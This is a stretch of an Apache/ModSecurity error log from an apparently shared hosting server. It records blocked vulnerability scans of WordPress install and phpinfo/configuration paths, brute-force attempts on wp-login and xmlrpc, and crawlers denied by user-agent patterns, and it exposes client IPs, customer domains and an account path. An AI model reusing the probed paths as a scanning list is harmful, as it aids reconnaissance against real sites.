[Tue May 26 17:31:17.229081 2026] [security2:error] [pid 894579:tid 894722] [client 54.205.63.235:61581] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rizpashop.com"] [uri "/old/wp-admin/install.php"] [unique_id "ahWLjQEtZWuWWBGzl__KqAAAARY"]
[Tue May 26 17:31:17.229533 2026] [security2:error] [pid 891273:tid 891428] [client 54.205.63.235:61583] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rizpashop.com"] [uri "/wordpress1/wp-admin/install.php"] [unique_id "ahWLjcDEzZ8z3jtDm82jgwAAABk"]
[Tue May 26 17:31:17.229801 2026] [security2:error] [pid 891273:tid 891461] [client 54.205.63.235:61584] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rizpashop.com"] [uri "/wp/wp-admin/install.php"] [unique_id "ahWLjcDEzZ8z3jtDm82jhAAAADo"]
[Tue May 26 17:31:17.230036 2026] [security2:error] [pid 894579:tid 894722] [client 54.205.63.235:61585] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rizpashop.com"] [uri "/backup/wp-admin/install.php"] [unique_id "ahWLjQEtZWuWWBGzl__KqgAAARY"]
[Tue May 26 17:31:17.230077 2026] [security2:error] [pid 894579:tid 894755] [client 54.205.63.235:61586] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rizpashop.com"] [uri "/demo/wp-admin/install.php"] [unique_id "ahWLjQEtZWuWWBGzl__KqwAAATc"]
[Tue May 26 17:31:17.290822 2026] [security2:error] [pid 894579:tid 894766] [client 54.205.63.235:61603] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rizpashop.com"] [uri "/test/wp-admin/install.php"] [unique_id "ahWLjQEtZWuWWBGzl__KrwAAAUI"]
[Tue May 26 17:31:18.465184 2026] [security2:error] [pid 894579:tid 894753] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLjgEtZWuWWBGzl__KzwAAATU"]
[Tue May 26 17:31:19.189418 2026] [security2:error] [pid 891273:tid 891445] [client 114.119.143.51:48769] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.samayikprasanga.in"] [uri "/archive/2020/02/17/15.jpg"] [unique_id "ahWLj8DEzZ8z3jtDm82jngAAACo"], referer: https://www.samayikprasanga.in/archive/2020/02/17/15.jpg
[Tue May 26 17:31:20.172796 2026] [security2:error] [pid 891273:tid 891467] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLj8DEzZ8z3jtDm82jowAAAEA"]
[Tue May 26 17:31:20.384058 2026] [core:crit] [pid 894579:tid 894809] (13)Permission denied: [client 40.77.167.13:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:31:21.124919 2026] [security2:error] [pid 891273:tid 891416] [client 223.235.98.214:27119] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWLkcDEzZ8z3jtDm82jsAAAAA0"]
[Tue May 26 17:31:21.125040 2026] [security2:error] [pid 891273:tid 891416] [client 223.235.98.214:27119] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWLkcDEzZ8z3jtDm82jsAAAAA0"]
[Tue May 26 17:31:21.227334 2026] [security2:error] [pid 891273:tid 891274] [remote 18.190.7.192:41434] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.7.190.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWLkcDEzZ8z3jtDm82jrgAANQA"]
[Tue May 26 17:31:21.282299 2026] [security2:error] [pid 894579:tid 894692] [remote 37.59.204.150:31044] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.d2cargo.com"] [uri "/robots.txt"] [unique_id "ahWLkQEtZWuWWBGzl__LYgABcnA"]
[Tue May 26 17:31:21.282491 2026] [security2:error] [pid 894579:tid 894815] [client 37.59.204.150:31044] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.d2cargo.com"] [uri "/robots.txt"] [unique_id "ahWLkQEtZWuWWBGzl__LYgABcnA"]
[Tue May 26 17:31:22.722673 2026] [security2:error] [pid 894579:tid 894618] [remote 54.39.6.136:39562] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.d2cargo.com"] [uri "/"] [unique_id "ahWLkgEtZWuWWBGzl__LmgABEiY"]
[Tue May 26 17:31:22.722877 2026] [security2:error] [pid 894579:tid 894718] [client 54.39.6.136:39562] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.d2cargo.com"] [uri "/"] [unique_id "ahWLkgEtZWuWWBGzl__LmgABEiY"]
[Tue May 26 17:31:22.846522 2026] [security2:error] [pid 894579:tid 894804] [client 114.119.153.191:42411] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "poonawallatennisacademy.com"] [uri "/2013/04/18/mother-teresa"] [unique_id "ahWLkgEtZWuWWBGzl__LowAAAWc"], referer: https://poonawallatennisacademy.com/category/others
[Tue May 26 17:31:23.086097 2026] [security2:error] [pid 894579:tid 894749] [client 85.208.96.210:56260] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/6/"] [unique_id "ahWLkwEtZWuWWBGzl__LqQAAATE"]
[Tue May 26 17:31:23.086219 2026] [security2:error] [pid 894579:tid 894749] [client 85.208.96.210:56260] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/6/"] [unique_id "ahWLkwEtZWuWWBGzl__LqQAAATE"]
[Tue May 26 17:31:23.092667 2026] [security2:error] [pid 894579:tid 894772] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLkgEtZWuWWBGzl__LlgAAAUc"]
[Tue May 26 17:31:24.886511 2026] [security2:error] [pid 894579:tid 894656] [remote 5.78.119.122:56130] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 122.119.78.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWLlAEtZWuWWBGzl__L6QABf0w"]
[Tue May 26 17:31:24.896728 2026] [core:crit] [pid 894579:tid 894740] (13)Permission denied: [client 40.77.167.49:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:31:25.362061 2026] [security2:error] [pid 894579:tid 894744] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLlAEtZWuWWBGzl__L9gAAASw"]
[Tue May 26 17:31:27.143169 2026] [security2:error] [pid 891273:tid 891431] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLlsDEzZ8z3jtDm82kHAAAABw"]
[Tue May 26 17:31:28.150010 2026] [security2:error] [pid 894579:tid 894771] [client 178.20.45.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWLmAEtZWuWWBGzl__MQgAAAUY"], referer: http://anujtradingco.com/blog/
[Tue May 26 17:31:29.982088 2026] [security2:error] [pid 894579:tid 894650] [remote 95.216.117.13:42444] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWLmQEtZWuWWBGzl__MVAABc0Y"]
[Tue May 26 17:31:30.243283 2026] [security2:error] [pid 891273:tid 891523] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLmcDEzZ8z3jtDm82kPAAAAHg"]
[Tue May 26 17:31:30.482217 2026] [security2:error] [pid 891273:tid 891310] [remote 103.91.67.202:12232] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.67.91.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWLmsDEzZ8z3jtDm82kRAAALCQ"]
[Tue May 26 17:31:30.585108 2026] [security2:error] [pid 894579:tid 894791] [client 66.249.88.193:58762] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moneyapp.com.co"] [uri "/index.php"] [unique_id "ahWLmgEtZWuWWBGzl__MWwAAAVo"]
[Tue May 26 17:31:31.804738 2026] [security2:error] [pid 891273:tid 891420] [client 223.235.98.214:23588] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWLm8DEzZ8z3jtDm82kTgAAABE"]
[Tue May 26 17:31:31.804865 2026] [security2:error] [pid 891273:tid 891420] [client 223.235.98.214:23588] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWLm8DEzZ8z3jtDm82kTgAAABE"]
[Tue May 26 17:31:32.524958 2026] [security2:error] [pid 894579:tid 894818] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLnAEtZWuWWBGzl__MaQAAAXU"]
[Tue May 26 17:31:34.952379 2026] [security2:error] [pid 894579:tid 894741] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLngEtZWuWWBGzl__MfAAAASk"]
[Tue May 26 17:31:35.325060 2026] [security2:error] [pid 894579:tid 894672] [remote 54.38.29.86:51032] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.29.38.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWLnwEtZWuWWBGzl__MfgABSlw"]
[Tue May 26 17:31:35.803023 2026] [security2:error] [pid 894579:tid 894777] [client 91.92.42.86:28544] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "service.google.com.anujtradingco.com"] [uri "/pinfo.php"] [unique_id "ahWLnwEtZWuWWBGzl__MiAAAAUw"], referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:31:35.844937 2026] [core:error] [pid 894579:tid 894805] [client 91.92.42.86:28568] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:31:35.844955 2026] [core:error] [pid 894579:tid 894805] [client 91.92.42.86:28568] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:31:35.853243 2026] [security2:error] [pid 891273:tid 891428] [client 91.92.42.86:28584] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/configuration.php"] [unique_id "ahWLn8DEzZ8z3jtDm82kdAAAABk"], referer: http://anujtradingco.com/
[Tue May 26 17:31:35.872882 2026] [security2:error] [pid 894579:tid 894831] [client 91.92.42.86:28622] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "service.google.com.anujtradingco.com"] [uri "/php_info.php"] [unique_id "ahWLnwEtZWuWWBGzl__MjwAAAYI"], referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:31:35.872936 2026] [core:error] [pid 894579:tid 894807] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:31:35.872952 2026] [core:error] [pid 894579:tid 894807] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:31:35.889914 2026] [security2:error] [pid 891273:tid 891497] [client 91.92.42.86:28642] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "service.google.com.anujtradingco.com"] [uri "/configuration.php"] [unique_id "ahWLn8DEzZ8z3jtDm82keAAAAF4"], referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:31:35.901553 2026] [security2:error] [pid 894579:tid 894796] [client 91.92.42.86:28646] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "greenfood.anujtradingco.com"] [uri "/portal/phpinfo.php"] [unique_id "ahWLnwEtZWuWWBGzl__MkAAAAV8"], referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:31:35.903125 2026] [security2:error] [pid 891273:tid 891513] [client 91.92.42.86:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWLn8DEzZ8z3jtDm82kcwAAAG4"], referer: http://anujtradingco.com/
[Tue May 26 17:31:35.905479 2026] [security2:error] [pid 894579:tid 894746] [client 91.92.42.86:28662] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "service.google.com.anujtradingco.com"] [uri "/phpinfo/info.php"] [unique_id "ahWLnwEtZWuWWBGzl__MkQAAAS4"], referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:31:35.926153 2026] [security2:error] [pid 891273:tid 891416] [client 91.92.42.86:28684] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/functions.php"] [unique_id "ahWLn8DEzZ8z3jtDm82kegAAAA0"], referer: http://anujtradingco.com/
[Tue May 26 17:31:35.931176 2026] [security2:error] [pid 891273:tid 891480] [client 91.92.42.86:28678] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "greenfood.anujtradingco.com"] [uri "/functions.php"] [unique_id "ahWLn8DEzZ8z3jtDm82kewAAAE0"], referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:31:35.936026 2026] [core:error] [pid 894579:tid 894748] [client 91.92.42.86:28670] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:31:35.936047 2026] [core:error] [pid 894579:tid 894748] [client 91.92.42.86:28670] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:31:35.938582 2026] [security2:error] [pid 894579:tid 894837] [client 91.92.42.86:28594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWLnwEtZWuWWBGzl__MjAAAAYg"], referer: http://anujtradingco.com/
[Tue May 26 17:31:35.951238 2026] [security2:error] [pid 894579:tid 894751] [client 91.92.42.86:28708] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/portal/phpinfo.php"] [unique_id "ahWLnwEtZWuWWBGzl__MlAAAATM"], referer: http://anujtradingco.com/
[Tue May 26 17:31:35.954946 2026] [security2:error] [pid 894579:tid 894747] [client 91.92.42.86:28686] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "service.google.com.anujtradingco.com"] [uri "/server_info.php"] [unique_id "ahWLnwEtZWuWWBGzl__MlQAAAS8"], referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:31:35.963658 2026] [security2:error] [pid 891273:tid 891421] [client 91.92.42.86:28724] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "service.google.com.anujtradingco.com"] [uri "/functions.php"] [unique_id "ahWLn8DEzZ8z3jtDm82kfgAAABI"], referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:31:35.970376 2026] [core:error] [pid 894579:tid 894736] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:31:35.970397 2026] [core:error] [pid 894579:tid 894736] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:31:35.972156 2026] [security2:error] [pid 891273:tid 891456] [client 91.92.42.86:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWLn8DEzZ8z3jtDm82keQAAADU"], referer: http://anujtradingco.com/
[Tue May 26 17:31:35.988487 2026] [security2:error] [pid 894579:tid 894739] [client 91.92.42.86:28742] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/server_info.php"] [unique_id "ahWLnwEtZWuWWBGzl__MmAAAASc"], referer: http://anujtradingco.com/
[Tue May 26 17:31:35.991736 2026] [security2:error] [pid 891273:tid 891446] [client 91.92.42.86:28786] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "service.google.com.anujtradingco.com"] [uri "/portal/phpinfo.php"] [unique_id "ahWLn8DEzZ8z3jtDm82kgQAAACs"], referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:31:35.994005 2026] [security2:error] [pid 891273:tid 891522] [client 91.92.42.86:28758] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "greenfood.anujtradingco.com"] [uri "/phpinfo/info.php"] [unique_id "ahWLn8DEzZ8z3jtDm82kggAAAHc"], referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:31:35.994758 2026] [security2:error] [pid 894579:tid 894835] [client 91.92.42.86:28774] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/test.php"] [unique_id "ahWLnwEtZWuWWBGzl__MmgAAAYY"], referer: http://anujtradingco.com/
[Tue May 26 17:31:36.004936 2026] [security2:error] [pid 894579:tid 894759] [client 91.92.42.86:28812] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/phpinfo/info.php"] [unique_id "ahWLoAEtZWuWWBGzl__MmwAAATs"], referer: http://anujtradingco.com/
